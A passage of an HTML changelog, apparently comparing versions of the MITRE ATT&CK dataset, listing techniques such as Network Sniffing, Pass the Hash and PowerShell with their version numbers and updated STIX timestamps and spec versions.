collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-16 20:07:53.048000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.709000+00:00</td></tr></tbody></table></details><hr><h4>[T1556.004] Modify Authentication Process: Network Device Authentication</h4><p><b>Current version</b>: 3.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-16 20:07:53.117000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.726000+00:00</td></tr></tbody></table></details><hr><h4>[T1059.008] Command and Scripting Interpreter: Network Device CLI</h4><p><b>Current version</b>: 1.2</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:02.287000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.670000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1602.002] Data from Configuration Repository: Network Device Configuration Dump</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:47.219000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.633000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1686.002] Disable or Modify System Firewall: Network Device Firewall</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-22 15:38:51.612000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.706000+00:00</td></tr></tbody></table></details><hr><h4>[T1584.008] Compromise Infrastructure: Network Devices</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-22 03:56:34.319000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.621000+00:00</td></tr></tbody></table></details><hr><h4>[T1556.008] Modify Authentication Process: Network Provider DLL</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-16 20:07:53.025000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.705000+00:00</td></tr></tbody></table></details><hr><h4>[T1590.006] Gather Victim Network Information: Network Security Appliances</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:55.360000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.640000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1046] Network Service Discovery</h4><p><b>Current version</b>: 3.2</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:31.494000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.723000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1070.005] Indicator Removal: Network Share Connection Removal</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 20:29:50.512000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.706000+00:00</td></tr></tbody></table></details><hr><h4>[T1040] Network Sniffing</h4><p><b>Current version</b>: 1.7</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:36.910000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.624000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1590.004] Gather Victim Network Information: Network Topology</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:37.652000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.625000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1095] Non-Application Layer Protocol</h4><p><b>Current version</b>: 2.4</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:20.136000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.713000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1132.002] Data Encoding: Non-Standard Encoding</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-21 18:10:25.277000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.717000+00:00</td></tr></tbody></table></details><hr><h4>[T1571] Non-Standard Port</h4><p><b>Current version</b>: 1.3</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:14.187000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.707000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1027] Obfuscated Files or Information</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 22:14:56.435000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.708000+00:00</td></tr></tbody></table></details><hr><h4>[T1218.008] System Binary Proxy Execution: Odbcconf</h4><p><b>Current version</b>: 3.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 22:40:01.263000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.640000+00:00</td></tr></tbody></table></details><hr><h4>[T1137.001] Office Application Startup: Office Template Macros</h4><p><b>Current version</b>: 1.2</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:59.432000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.643000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1036.011] Masquerading: Overwrite Process Arguments</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 20:40:03.475000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.632000+00:00</td></tr></tbody></table></details><hr><h4>[T1134.004] Access Token Manipulation: Parent PID Spoofing</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 19:54:42.976000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.706000+00:00</td></tr></tbody></table></details><hr><h4>[T1550.002] Use Alternate Authentication Material: Pass the Hash</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 22:48:07.235000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.723000+00:00</td></tr></tbody></table></details><hr><h4>[T1550.003] Use Alternate Authentication Material: Pass the Ticket</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 22:47:57.805000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.643000+00:00</td></tr></tbody></table></details><hr><h4>[T1110.002] Brute Force: Password Cracking</h4><p><b>Current version</b>: 1.4</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:29.397000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.622000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1556.002] Modify Authentication Process: Password Filter DLL</h4><p><b>Current version</b>: 3.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-16 20:07:53.031000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.626000+00:00</td></tr></tbody></table></details><hr><h4>[T1110.001] Brute Force: Password Guessing</h4><p><b>Current version</b>: 1.7</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:21.929000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.620000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1601.001] Modify System Image: Patch System Image</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-16 20:07:53.106000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.717000+00:00</td></tr></tbody></table></details><hr><h4>[T1574.007] Hijack Execution Flow: Path Interception by PATH Environment Variable</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 23:01:52.753000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.620000+00:00</td></tr></tbody></table></details><hr><h4>[T1574.008] Hijack Execution Flow: Path Interception by Search Order Hijacking</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 23:01:48.263000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.635000+00:00</td></tr></tbody></table></details><hr><h4>[T1574.009] Hijack Execution Flow: Path Interception by Unquoted Path</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 23:01:45.477000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.713000+00:00</td></tr></tbody></table></details><hr><h4>[T1120] Peripheral Device Discovery</h4><p><b>Current version</b>: 1.4</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:37.563000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.624000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1566] Phishing</h4><p><b>Current version</b>: 2.7</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-17 16:14:54.713000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.706000+00:00</td></tr></tbody></table></details><hr><h4>[T1598] Phishing for Information</h4><p><b>Current version</b>: 1.4</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-17 16:15:21.344000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.717000+00:00</td></tr></tbody></table></details><hr><h4>[T1647] Plist File Modification</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-16 20:07:52.947000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.644000+00:00</td></tr></tbody></table></details><hr><h4>[T1556.003] Modify Authentication Process: Pluggable Authentication Modules</h4><p><b>Current version</b>: 3.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-16 20:07:53.037000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.620000+00:00</td></tr></tbody></table></details><hr><h4>[T1677] Poisoned Pipeline Execution</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 02:38:29.636000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.642000+00:00</td></tr></tbody></table></details><hr><h4>[T1027.014] Obfuscated Files or Information: Polymorphic Code</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 22:20:58.199000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.709000+00:00</td></tr></tbody></table></details><hr><h4>[T1205.001] Traffic Signaling: Port Knocking</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 22:44:49.425000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.688000+00:00</td></tr></tbody></table></details><hr><h4>[T1055.002] Process Injection: Portable Executable Injection</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 22:28:35.452000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.665000+00:00</td></tr></tbody></table></details><hr><h4>[T1059.001] Command and Scripting Interpreter: PowerShell</h4><p><b>Current version</b>: 1.5</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:07.660000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.706000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1542] Pre-OS Boot</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-17 18:38:50.048000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.662000+00:00</td></tr></tbody></table></details><hr><h4>[T1690] Prevent Command History Logging</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: 